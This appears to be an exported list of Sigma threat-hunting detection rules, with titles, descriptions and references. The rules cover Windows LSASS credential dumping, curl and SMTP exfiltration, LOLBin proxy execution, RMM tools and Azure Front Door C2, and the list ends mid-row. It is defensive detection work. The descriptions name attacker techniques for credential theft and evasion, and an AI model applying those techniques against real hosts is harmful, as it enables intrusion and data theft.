Potentially Suspicious Azure Front Door Connection |
Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2)
that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
|
https://lots-project.com/site/2a2e617a75726566642e6e6574, https://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178, https://www.fortalicesolutions.com/posts/hiding-behind-the-front-door-with-azure-domain-fronting |
Network Connection Initiated From Users\Public Folder |
Detects a network connection initiated from a process located in the "C:\Users\Public" folder.
Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone.
Use this rule to hunt for potential suspicious or uncommon activity in your environement.
|
https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo |
PsExec Default Named Pipe |
Detects PsExec service default pipe creation |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
Uncommon PowerShell Hosts |
Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe |
https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html |
bXOR Operator Usage In PowerShell Command Line - PowerShell Classic |
Detects powershell execution with that make use of to the bxor (Bitwise XOR).
Attackers might use as an alternative obfuscation method to Base64 encoded commands.
Investigate the CommandLine and process tree to determine if the activity is malicious.
|
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_arithmetic_operators?view=powershell-5.1 |
Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet |
Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host. |
https://learn.microsoft.com/en-us/powershell/module/netsecurity/get-netfirewallrule?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/powershell/module/netsecurity/show-netfirewallrule?view=windowsserver2022-ps |
Compress-Archive Cmdlet Execution |
Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files.
An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md |
Windows Mail App Mailbox Access Via PowerShell Script |
Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails. |
https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1070.008/T1070.008.md |
New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock |
Detects when a powershell script contains calls to the "New-NetFirewallRule" cmdlet in order to add a new firewall rule with an "Allow" action.
|
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/ |
SMB over QUIC Via PowerShell Script |
Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments |
https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md, https://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps, https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/ |
Potential Registry Reconnaissance Via PowerShell Script |
Detects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md |
Use Of Remove-Item to Delete File - ScriptBlock |
PowerShell Remove-Item with -Path to delete a file or a folder with "-Recurse" |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md, https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7 |
Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet |
Detects the execution of a PowerShell script with a call to the "Send-MailMessage" cmdlet along with the "-Attachments" flag. This could be a potential sign of data exfiltration via Email.
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.4, https://www.ietf.org/rfc/rfc2821.txt |
WinAPI Library Calls Via PowerShell Scripts |
Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts. |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
WinAPI Function Calls Via PowerShell Scripts |
Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts. |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Potential Credential Dumping Attempt Via PowerShell |
Detects a PowerShell process requesting access to "lsass.exe", which can be indicative of potential credential dumping attempts |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
LSASS Access From Program In Potentially Suspicious Folder |
Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder |
https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf |
Uncommon GrantedAccess Flags On LSASS |
Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410 |
https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights, https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf |
Potential Shellcode Injection |
Detects potential shellcode injection as seen used by tools such as Metasploit's migrate and Empire's psinject. |
https://github.com/EmpireProject/PSInject |
Password Protected Compressed File Extraction Via 7Zip |
Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. |
https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/ |
Set Files as System Files Using Attrib.EXE |
Detects the execution of "attrib" with the "+s" flag to mark files as system files |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib, https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib, https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/ |
Potential BOINC Software Execution (UC-Berkeley Signature) |
Detects the use of software that is related to the University of California, Berkeley via metadata information.
This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
|
https://boinc.berkeley.edu/, https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software |
CMD Shell Output Redirect |
Detects the use of the redirection character ">" to redirect information on the command line.
This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
|
https://ss64.com/nt/syntax-redirection.html |
Potential File Override/Append Via SET Command |
Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign.
Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly.
Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt".
The typical use case of the "set /p=" command is to prompt the user for input.
|
https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1, https://ss64.com/nt/set.html |
Headless Process Launched Via Conhost.EXE |
Detects the launch of a child process via "conhost.exe" with the "--headless" flag.
The "--headless" flag hides the windows from the user upon execution.
|
https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software |
Dynamic .NET Compilation Via Csc.EXE - Hunting |
Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. |
https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/, https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf, https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/, https://twitter.com/gN3mes1s/status/1206874118282448897 |
File Download Via Curl.EXE |
Detects file download using curl.exe |
https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 |
Curl.EXE Execution |
Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server |
https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 |
Potential Data Exfiltration Via Curl.EXE |
Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration |
https://twitter.com/d1r4c/status/1279042657508081664, https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file, https://curl.se/docs/manpage.html |
Diskshadow Child Process Spawned |
Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. |
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow |
Curl.EXE Execution With Custom UserAgent |
Detects execution of curl.exe with custom useragent options |
https://curl.se/docs/manpage.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd |
ClickOnce Deployment Execution - Dfsvc.EXE Child Process |
Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 |
Diskshadow Script Mode Execution |
Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
|
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/, https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow |
Potential Proxy Execution Via Explorer.EXE From Shell Process |
Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe".
Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter.
While this is often a legitimate action, this rule can be use to hunt for anomalies.
Muddy Waters threat actor was seeing using this technique.
|
https://twitter.com/CyberRaiju/status/1273597319322058752, https://app.any.run/tasks/9a8fd563-4c54-4d0a-9ad8-1fe08339cbc3/ |
Potential DLL Sideloading Activity Via ExtExport.EXE |
Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa.
It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll".
Arbitrary DLLs can also be loaded if a specific number of flags was provided.
|
https://lolbas-project.github.io/lolbas/Binaries/Extexport/, https://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/, https://www.microsoft.com/en-us/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/, https://res.armor.com/resources/threat-intelligence/astaroth-banking-trojan/, https://securelist.com/the-tetrade-brazilian-banking-malware/97779/, https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/ |
Potential Password Reconnaissance Via Findstr.EXE |
Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages |
https://steflan-security.com/windows-privilege-escalation-credential-harvesting/, https://adsecurity.org/?p=2288 |
New Self Extracting Package Created Via IExpress.EXE |
Detects the "iexpress.exe" utility creating self-extracting packages.
Attackers where seen leveraging "iexpress" to compile packages on the fly via ".sed" files.
Investigate the command line options provided to "iexpress" and in case of a ".sed" file, check the contents and legitimacy of it.
|
https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior |
Microsoft Workflow Compiler Execution |
Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
|
https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/ |
CodePage Modification Via MODE.COM |
Detects a CodePage modification using the "mode.com" utility.
This behavior has been used by threat actors behind Dharma ransomware.
|
https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode, https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html, https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior |
Net.EXE Execution |
Detects execution of "Net.EXE". |
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/, https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html, https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html, https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe |
SMB over QUIC Via Net.EXE |
Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments. |
https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md, https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/ |
Suspicious New Instance Of An Office COM Object |
Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.
This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)
|
https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic, https://github.com/med0x2e/vba2clr |
Import New Module Via PowerShell CommandLine |
Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-5.1 |
Unusually Long PowerShell CommandLine |
Detects unusually long PowerShell command lines with a length of 1000 characters or more |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace |
Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace.
The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
These can be used for example in decrypting malicious payload for defense evasion.
|
https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0, https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html, https://www.virustotal.com/gui/file/39102fb7bb6a74a9c8cb6d46419f9015b381199ea8524c1376672b30fffd69d2 |
New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet |
Detects calls to the "New-NetFirewallRule" cmdlet from PowerShell in order to add a new firewall rule with an "Allow" action.
|
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/ |
Potentially Suspicious PowerShell Child Processes |
Detects potentially suspicious child processes spawned by PowerShell.
Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
|
https://twitter.com/ankit_anubhav/status/1518835408502620162 |
Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly |
Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location.
When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'.
|
https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/, https://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection, https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver, https://ss64.com/nt/regsvr32.html |
Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions |
Detects the execution of Action1 in order to execute arbitrary code or establish a remote session.
Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries.
Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed.
Hunting Opportunity 1- Weed Out The Noise
When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1":
ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0"
After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences.
Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours
If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
|
https://twitter.com/Kostastsale/status/1646256901506605063?s=20, https://www.action1.com/documentation/ |
Remote Access Tool - Ammy Admin Agent Execution |
Detects the execution of the Ammy Admin RMM agent for remote management. |
https://www.ammyy.com/en/admin_features.html |
Remote Access Tool - Cmd.EXE Execution via AnyViewer |
Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
|
https://www.anyviewer.com/help/remote-technical-support.html |
Remote Access Tool - ScreenConnect Remote Command Execution - Hunting |
Detects remote binary or command execution via the ScreenConnect Service.
Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
|
https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
DLL Call by Ordinal Via Rundll32.EXE |
Detects calls of DLLs exports by ordinal numbers via rundll32.dll. |
https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/, https://github.com/Neo23x0/DLLRunner, https://twitter.com/cyb3rops/status/1186631731543236608, https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/ |
Rundll32.EXE Calling DllRegisterServer Export Function Explicitly |
Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
|
https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/, https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior, https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver |
Scheduled Task Creation From Potential Suspicious Parent Location |
Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
|
https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/ |
SC.EXE Query Execution |
Detects execution of "sc.exe" to query information about registered services on the system |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery |
Potential CommandLine Obfuscation Using Unicode Characters |
Detects potential CommandLine obfuscation using unicode characters.
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
|
https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http |
Potentially Suspicious Compression Tool Parameters |
Detects potentially suspicious command line arguments of common data compression tools |
https://twitter.com/SBousseaden/status/1184067445612535811 |
Elevated System Shell Spawned |
Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
|
https://github.com/Wh04m1001/SysmonEoP |
EventLog Query Requests By Builtin Utilities |
Detect attempts to query the contents of the event log using command line utilities. Attackers use this technique in order to look for sensitive information in the logs such as passwords, usernames, IPs, etc.
|
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1, http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil |
Potential Suspicious Execution From GUID Like Folder Names |
Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks.
Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
|
https://twitter.com/Kostastsale/status/1565257924204986369 |
Execution From Webserver Root Folder |
Detects a program executing from a web server root folder. Use this rule to hunt for potential interesting activity such as webshell or backdoors
|
Internal Research |
Tunneling Tool Execution |
Detects the execution of well known tools that can be abused for data exfiltration and tunneling. |
https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ |
File or Folder Permissions Modifications |
Detects a file or folder's permissions being modified or tampered with. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11), https://github.com/swagkarna/Defeat-Defender-V1.2.0 |
Manual Execution of Script Inside of a Compressed File |
This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries.
From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios.
1. Compressed file opened using 7zip.
2. Compressed file opened using WinRar.
3. Compressed file opened using native windows File Explorer capabilities.
When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter."
|
https://app.any.run/tasks/25970bb5-f864-4e9e-9e1b-cc8ff9e6386a, https://app.any.run/tasks/fa99cedc-9d2f-4115-a08e-291429ce3692 |
Process Terminated Via Taskkill |
Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity.
Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process, https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/ |
Suspicious Tasklist Discovery Command |
Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist |
System Information Discovery Via Wmic.EXE |
Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS,
and GPU driver products/versions.
|
https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic, https://nwgat.ninja/getting-system-information-with-wmic-on-windows/, https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar, https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/, https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/, https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior |
WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript |
Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript |
https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://redcanary.com/blog/gootloader/ |
Arbitrary Command Execution Using WSL |
Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands.
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/, https://twitter.com/nas_bench/status/1535431474429808642 |
Cab File Extraction Via Wusa.EXE |
Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported.
|
https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html |
Scheduled Task Created - Registry |
Detects the creation of a scheduled task via Registry keys. |
https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/, https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5 |
Microsoft Office Trusted Location Updated |
Detects changes to the registry keys related to "Trusted Location" of Microsoft Office. Attackers might add additional trusted locations to avoid macro security restrictions. |
https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01 |
Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace |
Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace.
The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption.
These can be used for example in decrypting malicious payload for defense evasion.
|
https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0, https://squiblydoo.blog/2023/11/07/october-2023-solarmarker/ |
Command Executed Via Run Dialog Box - Registry |
Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
|
https://www.forensafe.com/blogs/runmrukey.html, https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71, https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/ |
Service Binary in User Controlled Folder |
Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\".
Attackers often use such directories for staging purposes.
This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation.
Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Shell Context Menu Command Tampering |
Detects changes to shell context menu commands. Use this rule to hunt for potential anomalies and suspicious shell commands. |
https://mrd0x.com/sentinelone-persistence-via-menu-context/ |
AWS EC2 Download Userdata |
Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment. |
https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py |
Potential Backup Enumeration on AWS |
